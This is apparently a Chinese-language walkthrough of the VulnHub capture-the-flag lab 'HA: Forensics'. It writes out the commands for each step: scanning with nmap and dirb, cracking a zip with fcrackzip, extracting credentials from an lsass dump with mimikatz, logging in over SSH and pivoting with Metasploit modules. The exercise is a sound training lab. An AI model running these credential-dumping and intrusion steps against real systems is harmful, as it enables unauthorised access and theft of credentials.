VulnHub渗透测试实战靶场-HA: FORENSICS

  • 题目描述
  • 环境下载
  • HA: FORENSICS靶机搭建
  • 渗透测试
    • 信息搜集
    • Flag获取
      • Flag-1
      • Flag-2
      • Flag-3
      • Flag-4

题目描述

HA: Forensics is an intermediate level of the lab, which gives you a hand on real-life experience in Cyber Forensic Investigation. This lab is completely dedicated to methods and tools of Cyber Forensic Investigation and there is evidence that can be found with various techniques. As it is a Capture-the-Flag, it is very important to note that it is not a root challenge, and comes with a primary motive to find all the flags.No. of Flags: 4Objective: Find all 4 flags (Getting Root is NOT the objective)

环境下载

戳此进行环境下载

HA: FORENSICS靶机搭建

将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.142

  • 使用 nmap 扫描开放的端口:sudo nmap -T4 -sS -A -Pn 192.168.246.142,发现开放了 22、80 两个端口

  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.142

Flag获取

Flag-1

  • 根据 dirb 扫描结果,访问 http://192.168.246.142/images/,最后两张图片名字具有可疑性

  • HxD 打开 fingerprint.jpg 发现 Flag-1

Flag-2

  • 扫描备份文件发现存在 tips.txt,访问 http://192.168.246.142/tips.txt

  • 下载 flag.zip 发现是加密的,访问 http://192.168.246.142/igolder/,发现 clue.txt 文件中存在 PGP 生成的私钥及使用公钥加密的信息,利用在线网站解密 PGP,得到
In case the forensic investigator forgets his password, this hint can help him, where the password is of 6 characters long , starting  3 characters is the word  "for" and the ending 3 characters are numeric

  • 根据提示生成密码本,再用 fcrackzip 进行爆破 fcrackzip -D -p passwd.txt flag.zip,得到密码为 for007
f = open(r'./passwd.txt','a')
for i in range(0,1000):if len(str(i)) < 2:print('for00' + str(i),file=f)elif len(str(i)) < 3:print('for0' + str(i),file=f)else:print('for' + str(i),file=f)

  • 解压压缩包,在 PDF 内拿到 Flag-2

Flag-3

  • 观察到 flag.zip 内还有转存文件 lsass.DMP,通过 mimikatz 来获取信息
mimikatz # sekurlsa::minidump lsass.dmpmimikatz # sekurlsa::logonPasswords full

  • NTLM 进行解密,得到一组用户名和密码:jasoos:Password@1
  • 利用 msfconsole 登录 ssh 服务
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.246.142
set username jasoos
set password Password@1
exploit

  • 利用 session -u 升级成一个 meterpreter 会话
sessions -l
sessions -u 1
sessions -l
sessions 2

  • 将 shell 转为交互式的 shell:python -c 'import pty;pty.spawn("/bin/bash")'
  • 执行 ifconfig 查看网络连接状态,发现还存在其它网段

  • 利用 msfconsole 后渗透模块的路由添加功能,添加网络路由然后对目标网络进行扫描,发现一台目标机器 172.17.0.2
set session 3
exploit
use post/multi/gather/ping_sweep
set session 3
set rhosts 172.17.0.0/24
exploit

  • 接着对目标进行端口扫描,发现目标开放了 21 端口
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-2000
exploit
  • 尝试匿名登录 ftp,成功登录并在 pub 目录下发现文件 saboot.001,用 get 命令下载下来查看

  • 在靶机起一个 http 服务,然后在 kali 上访问服务下载文件,得到 Flag-3

Flag-4

  • 在上一步的压缩包内还有一个文件 creds.txt,有一串 base64 字符串:amVlbmFsaWlzYWdvb2RnaXJs,解密得到 jeenaliisagoodgirl

  • 尝试用解密得到的字符串登录靶机账户,经过尝试后发现可以登录 forensic 用户,切换到该用户,发现其在 sudo 组里面,可以直接查看 root 目录中的文件,拿到 Flag-4

VulnHub渗透测试实战靶场-HA: FORENSICS相关推荐

  1. VulnHub渗透测试实战靶场 - Odin:1

    VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...

  2. VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1

    VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 环境下载 戳此进行 ...

  3. VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE

    VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...

  4. VulnHub渗透测试实战靶场笔记(持续更新)

    靶机(一)----Breach1.0 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网 ...

  5. vulnhub之CH4INRULZ渗透测试实战

    vulnhub之CH4INRULZ渗透测试实战 一.环境搭建 目标: 获取root权限,并获得flag 难度:中级 下载链接:https://download.vulnhub.com/ch4inrul ...

  6. 《树莓派渗透测试实战》——2.7 设置SSH服务

    本节书摘来自异步社区<树莓派渗透测试实战>一书中的第2章,第2.7节,作者[美]Joseph Muniz(约瑟夫 穆尼斯),Aamir Lakhani(阿米尔 拉克哈尼),朱筱丹 译,更多 ...

  7. 《树莓派渗透测试实战》——总结

    本节书摘来异步社区<树莓派渗透测试实战>一书中的第1章,作者 [美]Joseph Muniz(约瑟夫 穆尼斯) , Aamir Lakhani(阿米尔 拉克哈尼),更多章节内容可以访问云栖 ...

  8. 《树莓派渗透测试实战》——2.12 用例子总结以上步骤

    本节书摘来异步社区<树莓派渗透测试实战>一书中的第2章,第2.12节,作者[美]Joseph Muniz(约瑟夫 穆尼斯) , Aamir Lakhani(阿米尔 拉克哈尼),更多章节内容 ...

  9. 【渗透测试实战】PHP语言有哪些后门?以及利用方法

    目录 后门 php.ini构成的后门 .user.ini文件构成的PHP后门 反序列化 PHP序列化实现 常见处理器 序列化格式 private与protect PHP反序列化漏洞 利用点 SoapC ...

最新文章

  1. 安装百分之80卡住_石家庄铜铝80*80散热器品牌
  2. 嵌入式笔录(4)-LC并联电路选频和AM解调
  3. mysql的binary、char、varchar区别
  4. cocos2d-x初探学习笔记(11)--拖动间隐效果
  5. linux备份用户权限
  6. python android 库_Python库
  7. Java中根据URL下载gif图片文件
  8. “别傻了,你不需要区块链!”
  9. linux下,如何迁移mysql数据库存放目录。利用软连接简单快捷实现移动到home数据盘下...
  10. molloc/free和new/delete的区别
  11. 科普:千兆级LTE技术深度解析
  12. 阿里巴巴都害怕的区块链电商到底是什么?
  13. Windows XP/2003序列号更换工具 1.0
  14. python编程心得体会800字_Python学习心得体会
  15. 循环函数:while循环和for循环及函数定义
  16. java对象头markword_浅谈java对象结构 对象头 Markword
  17. cron表达式,看这篇就够了
  18. A/B-test显著性检验
  19. Android 天气APP(十一)未来七天的天气预报、逐小时预报、UI优化
  20. 很全的饮食英语词汇表

热门文章

  1. 【渝粤教育】电大中专药品储存与养护技术作业 题库
  2. php fpm 无法解析php,php-fpm解析.phps而不是显示代码(hilighted)
  3. 多线程赛马程序Java_Java线程优先级示例-在各优先级线程间“赛马”
  4. 2022Java基础、语法最全面试题,为秋招做好准备
  5. WebOS设置谷歌同步帐号
  6. ModSecurity-配置文件
  7. 浏览器默认迅雷下载问题
  8. 邮件被服务器退信是怎么了,发向这个地址总是被退信,请教怎么解决
  9. 餐饮后厨计算机应用,派勤助力智能厨房显示系统(KDS),革新餐饮后厨模式
  10. 德生收音机ICR—100拆机图解